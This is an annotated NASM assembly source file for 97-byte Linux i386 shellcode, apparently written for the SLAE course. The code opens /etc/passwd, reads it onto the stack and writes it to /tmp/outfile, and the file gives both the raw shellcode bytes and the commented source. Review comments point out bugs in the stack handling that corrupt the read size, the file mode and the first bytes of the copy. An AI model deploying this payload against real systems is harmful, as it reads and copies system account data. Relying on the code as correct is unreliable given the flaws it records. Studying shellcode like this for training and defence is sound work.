;Description: Copy /etc/passwd to /tmp/outfile (97 bytes)
;Shellcode: \x31\xc0\xb0\x05\x31\xc9\x51\x68\x73\x73\x77\x64\x68\x63\x2f\x70\x61\x68\x2f\x2f\x65\x74\x8d\x5c\x24\x01\xcd\x80\x89\xc3\xb0\x03\x89\xe7\x89\xf9\x66\x6a\xff\x5a\xcd\x80\x89\xc6\x6a\x05\x58\x31\xc9\x51\x68\x66\x69\x6c\x65\x68\x2f\x6f\x75\x74\x68\x2f\x74\x6d\x70\x89\xe3\xb1\x42\x66\x68\xa4\x01\x5a\xcd\x80\x89\xc3\x6a\x04\x58\x89\xf9\x89\xf2\xcd\x80\x31\xc0\x31\xdb\xb0\x01\xb3\x05\xcd\x80
;Author: Paolo Stivanin <https://github.com/polslinux>
;SLAE ID: 526
;-----------------------------------------------------------------------
; _start -- copy the contents of /etc/passwd into /tmp/outfile, then exit.
;
; Syntax: NASM (Intel operand order).
; ABI:    Linux i386 `int 0x80` system calls:
;         eax = call number, ebx / ecx / edx = arguments, result in eax.
; Flow:   open(src) -> read -> open(dst) -> write -> exit(5)
; Stack:  both path strings and the read buffer live on the stack.
;
; The instruction selection is NUL-free (small constants are loaded with
; xor + mov-to-8-bit-register or push/pop instead of a 32-bit mov), so the
; named constants below change only the source text, not the encoding.
;
; No system-call result is checked: a failing call is not detected and the
; sequence simply continues with whatever eax holds.
;
; Analysis note: the two path strings are built from plain ASCII 4-byte
; push immediates, so the fragments ("//et", "c/pa", "sswd", "/tmp",
; "/out", "file") are readable as-is in the assembled bytes.
;-----------------------------------------------------------------------

SYS_EXIT        equ     1
SYS_READ        equ     3
SYS_WRITE       equ     4
SYS_OPEN        equ     5

DST_FLAGS       equ     0102o           ; O_CREAT (0100o) | O_RDWR (02o)
DST_MODE        equ     0644o           ; rw-r--r--
READ_COUNT      equ     0xffff          ; 16-bit value pushed as the read size
EXIT_STATUS     equ     5

global _start

section .text

_start:
        ; ---- fd = open("/etc/passwd", O_RDONLY) -----------------------
        xor     eax, eax
        mov     al, SYS_OPEN
        xor     ecx, ecx                ; flags = 0 (O_RDONLY)
        push    ecx                     ; NUL terminator for the path
        push    dword 'sswd'            ; path is pushed back to front
        push    dword 'c/pa'
        push    dword '//et'            ; extra '/' pads the string to 12 bytes
        lea     ebx, [esp + 1]          ; skip the padding slash -> "/etc/passwd"
        int     0x80

        ; ---- n = read(fd, stack buffer, count) ------------------------
        mov     ebx, eax                ; ebx = source fd
        ; Only al is written: this relies on eax (the fd just returned)
        ; having zero upper bytes, i.e. on the open above having succeeded.
        mov     al, SYS_READ
        mov     edi, esp                ; edi = buffer start, kept for the write
        mov     ecx, edi
        ; NOTE(review): `push word` lowers esp by 2 but `pop edx` takes 4
        ; bytes, so only the low half of edx is READ_COUNT; the high half
        ; is whatever two bytes sat on top of the stack (here the leading
        ; "//" of the path), and esp ends up 2 bytes above edi. The count
        ; handed to read is therefore much larger than 0xffff, and the
        ; buffer is live stack memory that the read overwrites upward.
        push    word READ_COUNT
        pop     edx
        int     0x80
        mov     esi, eax                ; esi = byte count returned by read

        ; ---- fd = open("/tmp/outfile", O_CREAT|O_RDWR, 0644) ----------
        ; NOTE(review): esp is edi+2 at this point, so the 4-byte pushes
        ; below store into [edi] and [edi+1]; the first two bytes of the
        ; data just read appear to be zeroed before they are written out.
        push    SYS_OPEN
        pop     eax
        xor     ecx, ecx
        push    ecx                     ; NUL terminator for the path
        push    dword 'file'
        push    dword '/out'
        push    dword '/tmp'
        mov     ebx, esp                ; ebx -> "/tmp/outfile"
        mov     cl, DST_FLAGS           ; ecx was zeroed above, so ecx = flags
        ; Same push-word / pop-dword pattern as for the read size: only the
        ; low 16 bits of edx hold DST_MODE.
        push    word DST_MODE
        pop     edx
        int     0x80

        ; ---- write(fd, buffer, n) -------------------------------------
        mov     ebx, eax                ; ebx = destination fd
        push    SYS_WRITE
        pop     eax
        mov     ecx, edi                ; buffer start saved before the read
        mov     edx, esi                ; length = value returned by read
        int     0x80

        ; ---- exit(EXIT_STATUS) ----------------------------------------
        xor     eax, eax
        xor     ebx, ebx
        mov     al, SYS_EXIT
        mov     bl, EXIT_STATUS
        int     0x80